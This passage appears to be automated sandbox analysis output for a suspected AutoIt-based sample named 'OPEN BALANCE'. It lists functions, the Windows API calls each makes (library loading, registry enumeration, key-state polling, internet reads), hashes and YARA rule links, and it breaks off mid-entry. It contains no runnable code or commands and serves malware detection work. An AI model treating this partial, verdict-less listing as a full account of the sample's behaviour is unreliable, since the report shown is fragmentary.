API String ID: 145871493-2590602151
Opcode ID: 989bbdf40914699fb78a43cd0922d937fbda0119e5eae05afaaa47150990df8a
Instruction ID: b831b1012aa5d1b897571e9e6afcc4d3664e5be61966c9df5de9424dd1ed6504
Opcode Fuzzy Hash: 989bbdf40914699fb78a43cd0922d937fbda0119e5eae05afaaa47150990df8a
Instruction Fuzzy Hash: 07F05531802B269FCF787BA08C4896A7324FF00706B9C8356FD02E2254EB20DD49D68A

Function 00844E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00844EDD,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00844EAE
FreeLibrary.KERNEL32(00000000,?,?,00844EDD,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844EC0

Strings

kernel32.dll, xrefs: 00844E94
Wow64DisableWow64FsRedirection, xrefs: 00844EA8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 01f7c1a445d37ad318045ff85bc16b8f5759ea47ebbee25640af164e117c1006
Instruction ID: 57a498bc87c9fbaf40904c57cbb9fb822f18784c2e20281889d245ac1134dfcc
Opcode Fuzzy Hash: 01f7c1a445d37ad318045ff85bc16b8f5759ea47ebbee25640af164e117c1006
Instruction Fuzzy Hash: DFE08C36A026339BD6221B25AC1CB6B7758FF81B72B050216FC04E2250DF64CD02C0A0

Function 00844E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00883CDE,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844E74
FreeLibrary.KERNEL32(00000000,?,?,00883CDE,?,00911418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00844E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00844E6E
kernel32.dll, xrefs: 00844E5B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: fadc85840b154d06c06c69763ea823455f7870641bda678845031843bfdf31f1
Instruction ID: 868133824d64de680349949c7c86a4f947c926edadd7ed4cff906f56ef296e0c
Opcode Fuzzy Hash: fadc85840b154d06c06c69763ea823455f7870641bda678845031843bfdf31f1
Instruction Fuzzy Hash: C7D0E236A02A336B9A221B25AC18E8B7B18FF85B653454726F915E3265CF64CE02C5A0

Function 008C1C60 Relevance: 7.8, APIs: 5, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32(00000000,?), ref: 008C1DC0
WSAGetLastError.WS2_32 ref: 008C1DF2
htons.WS2_32(?), ref: 008C1EDB
inet_ntoa.WS2_32(?), ref: 008C1E8C

Part of subcall function 008A39E8: _strlen.LIBCMT ref: 008A39F2

Part of subcall function 008C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008BEC0C), ref: 008C3240

_strlen.LIBCMT ref: 008C1F35

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 5744f175664fb71caa1c55121081f2c0b82c8a628c6e614eceed250e396fd224
Instruction ID: 908f06f1958c29bc0bcc3f13fd76899cb6d42cc78e7c46b7a7bd3ae687db6140
Opcode Fuzzy Hash: 5744f175664fb71caa1c55121081f2c0b82c8a628c6e614eceed250e396fd224
Instruction Fuzzy Hash: 75B18D30204204AFD724DF28C885F2A77A5FF86318F54855CF5569B2A3DB71ED46CB92

Function 008CA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 008CA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008CA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 008CA468
CloseHandle.KERNEL32(?), ref: 008CA63D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: ed4133f735b83aaf7f3247be875bd05a818825896d2274839d942f3c19e48f23
Instruction ID: b04fcb01c095693bc45c9485ee1fb286f06e03b2b375c741bc49f099d34c0a15
Opcode Fuzzy Hash: ed4133f735b83aaf7f3247be875bd05a818825896d2274839d942f3c19e48f23
Instruction Fuzzy Hash: C3A16A716043019FD724DF28C886F2AB7E5FB84718F14885DF95ADB392DAB1EC458B82

Function 0087BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008E3700), ref: 0087BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0091121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0087BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00911270,000000FF,?,0000003F,00000000,?), ref: 0087BC36
_free.LIBCMT ref: 0087BB7F

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 0087BD4B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 32b396b463e676b6be3dc07962051a7490a4efef557c4b0ae159722577bb5a1c
Instruction ID: 4e0fb8ed7a376aacc115d82cd024a390cb340192df11a87b6171578ca63e77b3
Opcode Fuzzy Hash: 32b396b463e676b6be3dc07962051a7490a4efef557c4b0ae159722577bb5a1c
Instruction Fuzzy Hash: 41510A71904209AFCB14DF699C41AAEBBBDFF81320B10C66AE528D7299EB30DD40DB51

Function 008AE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ACF22,?), ref: 008ADDFD

Part of subcall function 008ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ACF22,?), ref: 008ADE16

Part of subcall function 008AE199: GetFileAttributesW.KERNEL32(?,008ACF95), ref: 008AE19A

lstrcmpiW.KERNEL32(?,?), ref: 008AE473
MoveFileW.KERNEL32(?,?), ref: 008AE4AC
_wcslen.LIBCMT ref: 008AE5EB
_wcslen.LIBCMT ref: 008AE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008AE650

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: a4d7198c436e06de67b9d9e5fd4bba94768febab59ef7cd1989ae1c4562ac8bf
Instruction ID: 86d592304d6ff4a5ffd0d7a881ef1fe1dc9c7dc90d583328d98b8f8b38eeaa18
Opcode Fuzzy Hash: a4d7198c436e06de67b9d9e5fd4bba94768febab59ef7cd1989ae1c4562ac8bf
Instruction Fuzzy Hash: F45191B24087455BD724EB94D8819DBB3DCFF85300F00092EF689C3591EF34A288876B

Function 008CB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008CB6AE,?,?), ref: 008CC9B5
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CC9F1
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA68
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008CBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008CBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008CBB63
RegCloseKey.ADVAPI32(?,?), ref: 008CBBA6
RegCloseKey.ADVAPI32(00000000), ref: 008CBBB3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: abe1c93fa38b2c44bf5f46ed2d259896e9c33754865aaf2cf64dec80041e8bea
Instruction ID: 777ee9af5d364732cbe9adfaa75dfd1e8f98e412c2832e6de73050877b128c31
Opcode Fuzzy Hash: abe1c93fa38b2c44bf5f46ed2d259896e9c33754865aaf2cf64dec80041e8bea
Instruction Fuzzy Hash: 89617931209645AFC314DF28C491E2ABBF5FF84318F14895DF49A8B2A2CB31ED45CB92

Function 008A8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008A8BCD
VariantClear.OLEAUT32 ref: 008A8C3E
VariantClear.OLEAUT32 ref: 008A8C9D
VariantClear.OLEAUT32(?), ref: 008A8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008A8D3B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 06cc2abb2c5df92aa99af15abd2863fe87db1e3ff1cea1851fb8d79bf46bf511
Instruction ID: 915c3921bd8eb26a5a26badff6aedf10c9e4a3b549de4d16549aac8779c0ff04
Opcode Fuzzy Hash: 06cc2abb2c5df92aa99af15abd2863fe87db1e3ff1cea1851fb8d79bf46bf511
Instruction Fuzzy Hash: D7518AB1A0021AEFDB10CF28C884AAAB7F9FF89314B118559F905DB350E734E911CFA0

Function 008B8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008B8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 008B8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008B8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008B8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008B8C5F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: f0fa0a0b88a7c53d24f9304c236d03903274de4bc24e94171eb71ebb09245012
Instruction ID: 6b9699b0ef9c291b14e980e84f5422aa5ab5dad21b6fdc7ea906530c5004a3ff
Opcode Fuzzy Hash: f0fa0a0b88a7c53d24f9304c236d03903274de4bc24e94171eb71ebb09245012
Instruction Fuzzy Hash: 72515A75A00219DFCB00DF68C881AAEBBF5FF48314F088459E849AB362CB35ED41CB91

Function 008C8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 008C8F40
GetProcAddress.KERNEL32(00000000,?), ref: 008C8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 008C8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 008C9032
FreeLibrary.KERNEL32(00000000), ref: 008C9052

Part of subcall function 0085F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,008B1043,?,7529E610), ref: 0085F6E6
Part of subcall function 0085F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0089FA64,00000000,00000000,?,?,008B1043,?,7529E610,?,0089FA64), ref: 0085F70D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 17a84152f5561f5dbe77de07bea744714a659a9229fdac48b73ced66b99fc64b
Instruction ID: 2648ae1eec5fe0bea098e3ffa6f0334c006017a7d4b708450c790105a27317a0
Opcode Fuzzy Hash: 17a84152f5561f5dbe77de07bea744714a659a9229fdac48b73ced66b99fc64b
Instruction Fuzzy Hash: E1513534601209DFCB11DF58C484DA9BBF1FF49314B0981A9E84AEB762DB31ED86CB91

Function 008D6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 008D6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 008D6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008D6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,008BAB79,00000000,00000000), ref: 008D6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008D6CC7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2541f6ab451605d5eea270a56ba425eb964c55b40f3fb804d0daf50e9df0d7a6
Instruction ID: 7f115b046198a1a43d90c79f3f10f83d7d0a158646a1e6e0579eae4234a73453
Opcode Fuzzy Hash: 2541f6ab451605d5eea270a56ba425eb964c55b40f3fb804d0daf50e9df0d7a6
Instruction Fuzzy Hash: F041AF35A14108AFDB24CF28CC58FA97BA5FB09360F15036AE995E73E0E771AD61DA40

Function 00872051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008720C3
_free.LIBCMT ref: 008720E3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: be9a3f5a3f00b041e071ee698e88776da960c9a0f38e608435e8ccea6f6dafe9
Instruction ID: 28fa995b72432ec2848122a70bc4319b6a4ea81e83642e1ee33c32b0cbb2b8f2
Opcode Fuzzy Hash: be9a3f5a3f00b041e071ee698e88776da960c9a0f38e608435e8ccea6f6dafe9
Instruction Fuzzy Hash: 3041E272A002049FCB20DF78C881A5DB7F5FF89314F1585A8EA19EB356D631ED01CB91

Function 0085912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00859141
ScreenToClient.USER32(00000000,?), ref: 0085915E
GetAsyncKeyState.USER32(00000001), ref: 00859183
GetAsyncKeyState.USER32(00000002), ref: 0085919D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 63e574cc976de02807c5e9a27e5e18e7d596285f430dec79c34b7c3b448c035c
Instruction ID: 7e0f299938e3b0d90f2671df3fccad403ab1485fea0045221cc9de9cbe25060b
Opcode Fuzzy Hash: 63e574cc976de02807c5e9a27e5e18e7d596285f430dec79c34b7c3b448c035c
Instruction Fuzzy Hash: 70414E31A0861AEBDF15AF68C844BEEB774FB05325F24831AE865E7290C7346D54CB91

Function 008B3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008B38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 008B3922
TranslateMessage.USER32(?), ref: 008B394B
DispatchMessageW.USER32(?), ref: 008B3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008B3966

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: f9f0727e4670744980d6f0b048df028890829d9c55618fa96a68ff20dce59a35
Instruction ID: ca326a8f4064ce485acebced50957e3b8d01b9f6f63a0cb2788333275ec25fb3
Opcode Fuzzy Hash: f9f0727e4670744980d6f0b048df028890829d9c55618fa96a68ff20dce59a35
Instruction Fuzzy Hash: 4E31B770618346AFEB35CB349C48BF63FA8FB06304F44456DE562C22A0E7B4A685DB11

Function 008BCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008BCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 008BCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,008BC21E,00000000), ref: 008BCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,008BC21E,00000000), ref: 008BCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,008BC21E,00000000), ref: 008BCFF2

Memory Dump Source

